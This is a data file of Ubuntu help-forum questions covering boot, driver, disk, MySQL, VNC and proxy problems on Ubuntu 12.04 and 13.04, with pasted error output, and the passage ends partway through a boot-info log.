321875	providing https access to multi-user sftp server	i have an sftp server running on ubuntu server 12.04 lts . any users in the 'sftponly ' group are chrooted into their home directory upon connection . as openssh requires the chrootdirectory to be owned by root , each user has a sub-folder named 'upload ' that they have permission to write to . this all works well , and users are restricted to their own area , whether they are aware of it or not . i would now like to provide access via http/https for users to download files using just a web browser . i have been looking into apache 's mod_userdir , but this seems to be geared more towards anonymous access . i would like the system to require the user to authenticate before being able to download from their folder . it should also only allow them to download from their folder . for example , a user would visit https : //download.example.com/testuser/file.zip and be required to authenticate using the same credentials as they would when connecting via sftp to download the file . i 've been looking into solutions like creating a seperate virtual host for each user , and manually creating htaccess files in each home dir , but they seem kind of untidy . any suggestions greatly appreciated .
321877	how to include/install other font types	how would you include/install other font types such as comicsans ( and others ) which are resident in mozilla thunderbird email when used in windows o/s , but not resident in mozilla thunderbird email in the ubuntu o/s ? thanks , michael m .
321878	mp4 and m4v files with dlna	while attempting serve a collection of purchased mp4 and m4v content through dlna with 13.04 , a systemic problem seems to be present . the server is ubuntu 13.04 . the client is a blue-ray player client . this is across a 1g line . when opening content with any ubuntu supported dlna software , ( pms , rygel , ushare , etc ) the video will load an a message will pop on the client saying , `` the connection failed , please check your network settings . '' the model of blue-ray player maybe at fault . the question is : is this becoming a problem with dlna ? users experiencing this problem may post similar experiences .
321884	is there a git indicator to get notification on commit , pull ?	is there an indicator for watching a git repository and get notification on commit , push , ... ? searching `` indicator ubuntu git watch repository '' send me a lot of indicator hosted on github ... ca n't find anything usefull for this ...
321886	right click on open space with scripts in nautilus 13.04	in 12.04 , i was able to create a script in the ~.gnome2/nautilus-scripts folder and it was available when i 'right click ' . i have a script that creates a folder structure for new customers : mkdir documents mkdir documents/customer mkdir documents/lics mkdir documents/ % mycompanyname % mkdir documents/ % mycompanyname % /quotes mkdir documents/mfg mkdir documents/deliverable mkdir documents/validations mkdir configs mkdir configs/sites mkdir configs/worksheets mkdir configs/backups mkdir configs/logs mkdir caps mkdir diagrams mkdir diagrams/screenshots mkdir diagrams/visio mkdir scripts i would create a folder under a `` clients '' folder ( customera ) containing the project i was working on that day ( or week ) . i would then open the folder , right-click on the open space and choose the scripts , 'mktree ' script . it would populate each customer file with all the necessary folders . i can no longer do this in 13.04 . well , maybe i can but have not figured it out . i saw some threads about scripts on a file or folder but not white space . this not only keeps me organized but also is easy to run a rsync to backup `` certain '' customer data to our server . any help would be greatly appreciated .
321891	split screen on booting	sometime , when i boot into ubuntu 12.04 i am greeted with the screen i have to boot again to get a normal screen . i have already tried deleting the .x* and .x* files .
321892	accidentally deleted workspaces	i deleted my workspaces in ubuntu studio , now i want to have them again . did n't find any answers .
321900	displaying old python version	my computer previously had python 2.7 . i recently installed python 3.2 . but when i run python prompt from the terminal , it still shows the version as 2.7.3. dineshkumar @ dineshkumar-desktop : ~ $ python python 2.7.3 ( default , apr 10 2013 , 05:46:21 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > how do i change it to 3.2 ?
321903	resetting forgotten phpmyadmin password	i recently installed lamp on ubuntu 13.04 ( 32-bit ) but forgot my phpmyadmin password . how can i reset its password without re-installing it ?
321904	ubuntu 32 to 64 bit	i 've installed ubuntu 12.04 in a dual boot with a windows 7 . i 've got the iso months ago to use in another pc ( 32bit ) . now i 've got an laptop with windows 7 64-bit , and installed the 32-bit ubuntu . how to proceed , if i want to use a 64-bit version of ubuntu ? ps : i 'm newbie in any linux os and in english language . thanks
321906	unity 2d for qt	i need the source packages of unity 2d to rebuild and run on qt , the problem is that i 'm using qt on windows right now . and i have no idea how download the unity 2d on windows 7 .
321909	steam wo n't update	it keeps showing me this warning when i try to update w : failed to fetch http : //ppa.launchpad.net/sergio91pt/synaptics+clickpads/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/sergio91pt/synaptics+clickpads/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
321913	proprietary drivers ati radeon hd in ubuntu 13.04 do n't work	i have a hp dv7 pavillion with amd/intel hybrid graphics . the amd is a radeon hd 6370m , totally supported by amd . i want to run with proprietary drivers to properly play games . i 've already rigorously tried : 1 ) the method presented by marian lux here ; 2 ) the method presented here , both usual and beta ( 13.6 ) versions ; 3 ) the method presented here by alexislavie , properly adapted to 13.04 version ( that means , downloading the driver 13.4 ) ; 4 ) the first method presented here by chris carter , except for nomodeset configuration ; 5 ) the second method presented there in the previous link by nick andrik ; 6 ) the method presented here by rodrigo martins . all of them were tested in fresh new installations of ubuntu 13.04 ( imagine how much time i 've wasted reinstalling -- clean -- versions of ubuntu 13.04 ) . the results i get : 1 ) everytime when the installation is successful and i can apply the `` sudo aticonfig -- initial '' command ( or its variants ) , the reboot returns me to the black screen ( where it 's said i 'm running in `` low graphics '' ) . 2 ) eachtime when the installation seems not be successful ( i.e. , i ca n't apply the previous command or i simply do n't do it - or even i restore the original `` xorg.conf '' back ) i can login but the unity is broken , and the `` fglrxinfo '' command also returns that there 's a problem . i would even try ubuntu 12.04 if i were sure that those problems are related with my ubuntu version , but i do n't think so . that 's why i 'd appreciate your help to get those drivers properly working in ubuntu 13.04 . [ edit ] just to register : i 've made another -- clear -- installation of ubuntu 13.04 and tried rigorously exactly accurately ... the method proposed by rodrigo martins . it did n't work . after rebooting , i get back to the black screen the system is running in low-graphics mode . thank you in advance !
321923	wobbly effect in ubuntu 13.04	i have installed ubuntu 13.04 but wobbly effect is not there.. i need that effect.. i searched ccsm but the option to enable is not there . help .
321924	how do i configure a minimal desktop environment ?	at work i have an option of using windows or linux . i 'm a java programmer , so i do n't necessary need to use windows . and honestly , i 'm looking forward to gaining some experience with linux . i have n't worked in a linux environment for almost a decade and , i 'm a bit overwhelmed by the ubuntu desktop . not sure if my question will make sense : i was wondering , is there a way to turn the desktop off . i still like to have a windowing system ( xterm ) and an application launcher - ( something like quicksilver or lunchy ) would be super nice . a gui login would be nice as well . everything else off the screen ... this is linux so i figure what i want to do is possible - just do n't know how to get there . any tutorials , or instructions would be greatly appreciated !
321927	i ca n't open ubuntu software centre	when i try open the software centre from a terminal , this is the reply : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/repo.steampowered.com_steam_dists_precise_steam_binary-i386_packages e : the package lists or status file could not be parsed or opened . what should i do ? thanks for your help
321931	updating vim 7.3.429 to 7.3.885 on ubuntu 12.04	i have installed version 7.3.429 of vim on my ubuntu 12.04 and want to update to the version 7.3.885 . could someone guide me ? i thank you in advance .
321934	which media players available in the ubuntu repositories uses gstreamer , gtk+ and were written in python ?	i 'm planning to write a media player for ubuntu to present in fair in the place i study . and i 'd like to use gstreamer and gtk+ with python , but i could not find a good documentation about the gstreamer binding on python and i 'd like to see some code examples . so i 'd like to request ( please ) a list with some media players available in the ubuntu repositories uses gstreamer , gtk+ and were written in python ? if possible in python 3 , but this may be asking too much . note : i tried to look for some on launchpad but is pretty hard to find something in general there because there is no filters for searching something like media players . thanks .
321935	ubuntu 12.04 server vm in kvm	when i install a ubuntu server vm on my kvm machine it appears to install fine . however after initial reboot , i am presented with the normal login screen . after i put in my credentials and authenticate it loops back to the login screen . this is server so i am at a cli screen and not gui . is there a fix for this or is it something with my machine ? its really frustrating .
321940	booting from usb fails	i made a bootable flash drive on unetbootin for a linux lite image , but when i restart my computer and set flash drive as the first boot option it just boots into ubuntu like usual .
321951	`` ca n't create test file /var/lib/mysql/user-desktop.lower-test '' : how to run mysql server on xubuntu 13.04 ( kubuntu-desktop )	i have downloaded and unpacked mysql 5.6.12 to /opt/mysql/server-5.6 . i want to use this db instead of pre-installed 5.5 version . but neither version works . when i want to start a server with mysqld -- console ( pre-installed version ) i get this error : user @ user-desktop : ~ $ sudo mysqld -- console [ sudo ] password for user : 130719 19:26:17 [ warning ] ca n't create test file /var/lib/mysql/user-desktop.lower-test 130719 19:26:17 [ warning ] ca n't create test file /var/lib/mysql/user-desktop.lower-test mysqld : ca n't change dir to '/var/lib/mysql/ ' ( errcode : 2 ) 130719 19:26:17 [ error ] aborting 130719 19:26:17 [ note ] mysqld : shutdown complete there are no any of these dirs in my system : /var/lib/mysql/ /var/lib/mysql/ /var/lib/mysql/ how can it be ? mysql is pre-installed but dirs are absent . should i create them manually ? or do i need to do smth else , run some program , to create them ? what mode do i need to set for them ? there is some mysql_install_db program in the system . should i run it to set up mysql ?
321953	frequency out of range message when using console	why does an error message appear when i switch to a terminal using ctrl + alt + f1 : 135k / 91 hz frequency is out of range and more importantly , how do i fix this ?
321956	cloning ubuntu over network	i want to migrate with my 12.04 to another machine . i have found the way with dd and hope it will work for me . the thing is that i have to somehow connect both drives to do the actual cloning . i 'm trying nfs . when i write in /etc/exports : /dev/sda1 10.42.0.16 ( rw , async , subtree_check ) and invoke exportfs -a i end up with the following error : exportfs : /dev/sda1 is neither a directory nor a file . remote access will fail any clues how i can overcome the problem ? is it a matter of configuration or nfs is a dead end and i have to use something different ?
321963	how to rename all files in folder with name ending with `` _backup ''	i have a bunch of images that were somehow renamed from myimage.jpg to myimage.jpg_backup , so the images on my website do n't load anymore . how would i recursively find all images ending with _backup and remove just the _backup part while preserving the rest of the filename ? i tried something like this : sudo find . -name `` *.jpg_backup '' -exec rename -n 's/_backup $ // ' *.jpg_backup ' ; ' but it gives me an error : ca n't rename *.jpg_backup *.jpg : no such file or directory
321967	wacom capture detected by terminal , but not by ubuntu 's wacom settings	i swear i have checked every thread on here about getting this tablet to show up , but most of them are old and seem to no longer work . so here 's the deal : -i 'm running ubuntu 13.04 -terminal says it 's there when it 's plugged in , settings says it 's not -the tablet is definitely functional , the lights are on , etc . -i 've added ( and then removed ) a billion other repositories from old fixes that seem to no longer have the drivers in them ( terminal has never been able to find `` wacom-dkms '' in any of them ) somebody smarter than me should take a crack at this . i 'd really appreciate it ! p.s . i 'm not super great at understanding terminal and linux in general yet -- just pretend like you 're talking to a ten year old and we 'll be in good shape .
321972	is there a software that `` simply '' copies files from my pc , from some directories , to a nas ?	i 've buy a nas and i want to configure my ubuntu to make backup on it . the problem is that the software installed on ubuntu creates backup compressed , i would like to access files on nas without decompression , etc . is there a software that `` simply '' copies files from my pc , from some directories , to the nas ? or have i to create a little bash file with rsync ? thanks !
321979	when does ubuntu 12.04 run network if-pre-up.d and if-up.d scripts ?	i want to reload my previous firewall rules using an iptables-restore when my ubuntu 12.04 server boots up . i 'm using a vps , and the virtualization backend writes to /etc/init.d/networking , so i 'm not able to use pre-up command there ( because it will just be overwritten ) . after reading the documentation , i tried to use both if-preup.d and if-up.d to run my firewall script . however , after restarting my server the script i placed in either of these directories was not run . this is a no-gui , base ubuntu 12.04 server vm that does not have network-manager installed .
321980	unable to write into external hdd and in its properties no file system format details are shown in ubuntu 13.04	i have recently changed os from ubuntu 12.10 to 13.04 . then onwards my external hdd ( mounted as vivek ) became read only . when i try to create a new folder it shows an error msg as shown in figure . i have changed the ownership to me only but still when i use chmod 777 -fr /media/vivek/vivek , it is not effecting the read write and execute permissions . when i try using sudo fsck -p /dev/sdb1 or sudo fsck.vfat -r /dev/sdb1 it is showing a message as `` currently , only 1 or 2 fats are supported , not 0 . '' when i check the properties of the hard disk , at the place of file system format it is not showing either fat32 or ntfs but blank . please help me out to get rid of this problem so that i can cut/copy/create new folders in my external hdd . btw i am still able to do all these on the same external hdd when connected to any other system running on windows .
321984	unable to install any software or updates in ubuntu 13.04	linux balu-system-product-name 3.8.0-23-generic # 34-ubuntu smp wed may 29 > 20:24:54 utc 2013 i686 athlon i686 gnu/linux i frequently get this type of error when installing software : dpkg : error processing linux-image-extra-3.8.0-19-generic i tried installing vlc through software centre and through the terminal . 1 ) software centre removing linux-image-extra-3.8.0-19-generic ... /var/lib/dpkg/info/linux-image-extra-3.8.0-19-generic.postrm : 6 : /var/lib/dpkg/info/linux-image-extra-3.8.0-19-generic.postrm : syntax error : `` ) '' unexpected dpkg : error processing linux-image-extra-3.8.0-19-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-extra-3.8.0-19-generic error in function : 2 ) terminal dpkg : warning : files list file for package 'oracle-java7-installer ' missing ; assuming package has no files currently installed ( reading database ... 302933 files and directories currently installed . ) removing linux-image-extra-3.8.0-19-generic ... /var/lib/dpkg/info/linux-image-extra-3.8.0-19-generic.postrm : 6 : /var/lib/dpkg/info/linux-image-extra-3.8.0-19-generic.postrm : syntax error : `` ) '' unexpected dpkg : error processing linux-image-extra-3.8.0-19-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : linux-image-extra-3.8.0-19-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please answer me . sorry for the previous posts ; i have deleted them .
321985	external drive data is not available on other os other than ubuntu	i have 1 tb hdd . it was working well both in ubuntu and windows , but three days go i can see my data and folders in ubuntu only . but when i insert this hdd on other system having windows it is detected but not showing any folder . but when i check properties it shows me exactly how much disk space is available . i do n't have space to backup my data and format drive my hdd is almost full here are my hdd details : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x27ddc48f device boot start end blocks id system /dev/sda1 * 2048 134146047 67072000 7 hpfs/ntfs/exfat /dev/sda2 134146048 297983999 81918976 7 hpfs/ntfs/exfat /dev/sda4 297986046 625121279 163567617 f w95 ext 'd ( lba ) /dev/sda5 461836683 625121279 81642298+ 7 hpfs/ntfs/exfat /dev/sda6 452085291 461836619 4875664+ 82 linux swap / solaris /dev/sda7 297986048 452083704 77048828+ 83 linux partition table entries are not in disk order disk /dev/sdb : 1000.2 gb , 1000170586112 bytes 255 heads , 63 sectors/track , 121597 cylinders , total 1953458176 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00023f15 device boot start end blocks id system /dev/sdb1 2048 1953458175 976728064 7 hpfs/ntfs/exfat any help will note : i do n't have other drive to backup my data , my drive is getting recognized on other system
321988	dual boot with windows 8 uefi - ubuntu/grub being bypassed	i recently got a dell inspiron 13z with windows 8 . i decided to dual boot ubuntu . after install , it was booting straight into ubuntu , with no grub menu showing up . no problem . i just ran boot repair and everything seemed to work fine . ( here 's the output , btw : http : //paste.ubuntu.com/5891478/ ) then i booted into windows . now i ca n't seem to get back into ubuntu . i tried disabling fast boot by running reg add `` hklm\system\currentcontrolset\control\session manager\power '' /v hiberbootenabled /t reg_dword /d 0 /f in powershell as administrator . even now , grub is still being bypassed somehow . what should i do ? edit : i tried reinstalling grub by booting a liveusb and following this : http : //superuser.com/questions/376470/how-to-reinstall-grub2-efi . unfortunately , that did n't work .
321992	installing dpkg error `` requested operation requires superuser privilege ''	running ubuntu version 13.04 and login as administrator and says i need to a superuser to run dpkg , i thought admin was a superuser . what am i doing wrong ? avid @ david-dell-dm051 : ~/documents $ dpkg -i vzaccess-7.5_2766f-1ubuntu1110.deb dpkg : error : requested operation requires superuser privilege david @ david-dell-dm051 : ~/documents $
321997	force ubuntu to access internet through proxy	i 've set up a squid forward proxy to cache all internet requests . i have a public ip and opened port 3128 . now i just need to set my ubuntu server to force all internet connections to pass through this proxy , using the ip address and port number . i know this command which will make ubuntu access the internet via a proxy , but i was told it was n't permanent . export http_proxy= '' http : //proxy.example.com:8080 '' which command do i need to use to force ubuntu to go through this proxy regardless of reboots or sessions ? thanks
322002	printing coupons in linux	i need to print coupons from websites such as coupons.com but , the website does n't allow me to print using linux . is there any way around this ? i heard that i can possibly do this by downloading user agent switcher ? the download for the program needed to print these coupons is windows and mac os only .
322004	how can i get my windows drive to show in ubuntu 12.04 lts ?	i installed ubuntu 12.04 lts . it works fine but it does not show any of the windows partitions neither is it showing any pen drive that i 'm trying to insert . it was also not showing any external hard disk . edit when i 'm mounting the drives by mount command , it gets mounted . the problem seems to be with auto mount . i also tried typing dconf-editor in terminal and then see the auto mount option under org.gnome.desktop.media-handler . it was set . so what is the problem now ?
322006	vnc on ubuntu 13.04 - not showing full desktop	i am trying to use vnc on ubuntu 13.04 but i am unable to get full desktop . so far what i have got is a error message that says `` failed to load session ubuntu-2d '' , or a blank screen or a desktop background with no shortcut icons or a desktop background with only a terminal window and no icons , with different changes in code . i want to have a full desktop view with toolbars and launcher , for all the functionality i need . i have the xstartup file [ both for user and root ] as # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager unset dbus_session_bus_address # exec /etc/x11/xinit/xinitrc [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & gnome-session -- session=gnome-classic & but its showing only a blank screen and the error message . any ideas how to solve this ? also i am running ubuntu on my machine using oracle virtualbox , can that be a part of problem ?
322008	uninstalling ubuntu ?	i have ubuntu 12.04.2 along with windows 7 . i absolutely liked it ! but i now want to uninstall this version , reinstall windows 7 and again install ubuntu . how do i remove ubuntu 12 from my system ? i have a boot usb from which i installed the software . the control panel shows ubuntu installed on the system . i tried removing it from the add/remove programs . but it did not work ! how do i go about it . ?
322010	ubuntu 13.04 shutdown freeze	i am facing shutdown problem with ubuntu 13.04 i have tried following solutions but nothing worked so far : i have tried to upgrade kernel by following this tutorial but facing error . cat /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/make.log dkms make.log for bcmwl-6.20.155.1+bdcom for kernel 3.9.0-030900-generic ( i686 ) sat jul 20 00:24:07 ist 2013 make : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cfg80211 api is prefered for this kernel version using cfg80211 api ld /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/built-in.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/shared/linux_osl.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_linux.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_iw.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.o /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1578:2 : warning : initialization from incompatible pointer type [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1578:2 : warning : ( near initialization for ‘wl_cfg80211_ops.set_tx_power’ ) [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1579:2 : warning : initialization from incompatible pointer type [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1579:2 : warning : ( near initialization for ‘wl_cfg80211_ops.get_tx_power’ ) [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c : in function ‘wl_update_bss_info’ : /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:2025:3 : warning : passing argument 1 of ‘cfg80211_put_bss’ from incompatible pointer type [ enabled by default ] in file included from /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:33:0 : include/net/cfg80211.h:3302:6 : note : expected ‘struct wiphy *’ but argument is of type ‘struct cfg80211_bss *’ /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:2025:3 : error : too few arguments to function ‘cfg80211_put_bss’ in file included from /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:33:0 : include/net/cfg80211.h:3302:6 : note : declared here make [ 1 ] : *** [ /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.o ] error 1 make : *** [ _module_/var/lib/dkms/bcmwl/6.20.155.1+bdcom/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' and i have also tried this link and this logs : cat /var/log/syslog jul 20 00:27:45 ubuntu anacron [ 1120 ] : job `cron.daily ' terminated jul 20 00:27:45 ubuntu anacron [ 1120 ] : normal exit ( 1 job run ) jul 20 00:35:02 ubuntu cron [ 16506 ] : ( root ) cmd ( command -v debian-sa1 > /dev/null & & debian-sa1 1 1 ) jul 20 00:39:01 ubuntu cron [ 16569 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -x /usr/lib/php5/sessionclean ] & & [ -d /var/lib/php5 ] & & /usr/lib/php5/sessionclean /var/lib/php5 $ ( /usr/lib/php5/maxlifetime ) ) i know this issue has been previously raised but i am unable get this fixed ... . someone please help me ... .
322015	ubuntu to lubuntu migration using only apt-get ( for ubuntu 13.04 )	i know this question has been covered many times in blogs and here , but because it depends on the version , and i could n't find anything for 13.04 , i need to ask it here . so here it goes - i have installed ubuntu ( unity ) , and now i want to migrate to lubuntu . i know how to install it : sudo apt-get install lubuntu-desktop given that i have installed a lot of additional packages how do i remove all traces from ubuntu , but at the same time preserve my additionally installed packages ? what should go in this line : sudo apt-get remove_or_autoremove_or_purge ? ? ? which_packages ? ? ?
322016	windows failed to start when trying to intsall ubuntu from a dvd i burned	as the title says when i select unetbootin as my os i get an error saying that windows failed to start . it advises me to repair using my windows disc . then i get this on the screen : file : \ubnldr.mbr status : 0xxx000000f info : the application or operating system could n't be loaded because a required file is missing or contains errors . i am using windows 8 and ubuntu 13.04 . so i was already booting in legacy . on a lark i decided to try uefi and that has made it so i can not even boot windows after switching back to legacy . i get : error no such partition grub rescue > from the boot menu i can enter either p2 : tsstcorp dvdwbd sn-406ab or p1 : wdc wd7500bpkt-75pk4t0 or bigfoot boot agent . this is quickly going from bad to catastrophic . please assist . i am in way over my head now . i removed the ubuntu dvd and still no luck getting back into windows . any advice on getting around this or understanding what the problem is would be appreciated .
322019	encrypted ubuntu 13.04 on ssd does not work	i got a fresh ubuntu 13.04 full os encryption installed to my ssd . on boot i 'm not able to type anything at all in the decryption screen . the keyboard works perfectly fine in grub , but in decryption screen it 's like the keyboard gets disabled . i 've also tried recovery mode , not any luck there either ... i 've tried to reinstall multiple times , but the same happens over and over again . however , when i install it to a hard drive , ubuntu works perfectly fine . i am using ubuntu 's own full os encryption , from installation . anyone got any tips ? as always , thanks in advance ! edit : i 've also tried moving boot partition to a hard drive , but that does n't help at all
322025	no sound by speaker in ubuntu 12.04 , only by headphones ( re installing , updating and in liveusb without sound )	i installed ubuntu 12.04 and the speakers do n't work . before i had 13.04 without problems about sounds . i re install ubuntu 12.04 and update , and also no sound , only by headphones . also i tried by ubuntu live and does n't work . i tried alsamixer , and the sound it 's high . and looks like no problem all the configuration , but not are sound by speakers .
322028	is there a way go start google search from ubuntu desktop ?	i 'm not talking about the google desktop search , i 'm looking for something more like an android-style widget , where i can enter the search term while on the desktop and it will launch the browser with the search results .
322032	still ca n't access ubuntu 12.04 lts from boot after installing twice in two different ways	i have been trying to figure out on how to solve my problem for nearly 20+ hours , and i still can not seem to figure out the solution . if anyone has suggestions please do tell me ! also as a side not , after switching from os to os quite a few times , i am not going back to the linux environment to fix the problem until i have a better understanding of what i am dealing with . thank you guys in advance for helping me out come up with a solution ! after trying out ubuntu 12.04 lts where it is installed as a program under windows 7 , i decided to allocate some driver space for the os to actually install it on my computer so that it can run on its own rather than under windows 7 . before i installed ubuntu , i allocated space for the os by shrinking the c : drive by 100 gb , which is where i am going to install ubuntu . i installed ubuntu with the `` install along side windows 7 option '' selected with no problems . but when i restarted my computer , it loaded windows 7 immediately with no boot menu displaying . i restarted again and once more the menu did not show up . so i figured that maybe i installed it incorrectly so i installed it again . when i installed ubuntu , this time i selected the last option in the install options . this led me to a window that shows all the /dev/sda options on where i am going to install ubuntu . now the thing that confuses me is that the 100 gb space i allocated is called dev/sda5 ext 4 . there was a free space option but that was only 20 gb in size . since the 100gb /dev/sda5 ext 4 option seems the proper place to put ubuntu , this is where i selected to install . after installation , i restart the computer and once again it boots up windows 7 immediately with no boot menu specifying which os i can select . i checked under disk management in windows and the space that i allocated for ubuntu under windows stills says that 100 gb unallocated . should n't it say something else ? or is that normal or did i do something wrong ? any advice would be much appreciated on how i can fix this problem ! below i will post the results of running boot info script : boot info script 0.61 july 19 2013 ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos4 ) /boot/grub on this drive . = > windows is installed in the mbr of /dev/sdb . = > grub2 ( v1.99 ) is installed in the mbr of /dev/mapper/isw_cgcfhffaff_xw133ce29743 and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos4 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : vfat boot sector type : dell utility : fat16 boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sda4 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : /dev/sda4 already mounted or sda4 busy sdb1 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : /dev/sda4 already mounted or sda4 busy mount : unknown filesystem type '' isw_cgcfhffaff_xw133ce297431 : __________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : /dev/sda4 already mounted or sda4 busy mount : unknown filesystem type '' mount : unknown filesystem type '' isw_cgcfhffaff_xw133ce297432 : __________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : /dev/sda4 already mounted or sda4 busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_cgcfhffaff_xw133ce297433 : __________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : /dev/sda4 already mounted or sda4 busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_cgcfhffaff_xw133ce297434 : __________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : /dev/sda4 already mounted or sda4 busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 63 80,324 80,262 de dell utility /dev/sda2 * 81,920 41,627,647 41,545,728 7 ntfs / exfat / hpfs /dev/sda3 41,627,648 1,748,717,567 1,707,089,920 7 ntfs / exfat / hpfs /dev/sda4 1,748,717,568 1,953,523,711 204,806,144 83 linux drive : sdb _____________________________________________________________________ disk /dev/sdb : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 16,775,167 16,773,120 84 os/2 hidden c : drive drive : isw_cgcfhffaff_xw133ce29743 _____________________________________________________________________ disk /dev/mapper/isw_cgcfhffaff_xw133ce29743 : 1000.2 gb , 1000202698752 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953520896 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/mapper/isw_cgcfhffaff_xw133ce297431 63 80,324 80,262 de dell utility /dev/mapper/isw_cgcfhffaff_xw133ce297432 * 81,920 41,627,647 41,545,728 7 ntfs / exfat / hpfs /dev/mapper/isw_cgcfhffaff_xw133ce297433 41,627,648 1,748,717,567 1,707,089,920 7 ntfs / exfat / hpfs /dev/mapper/isw_cgcfhffaff_xw133ce297434 1,748,717,568 1,953,523,711 204,806,144 83 linux /dev/mapper/isw_cgcfhffaff_xw133ce297434 ends after the last sector of 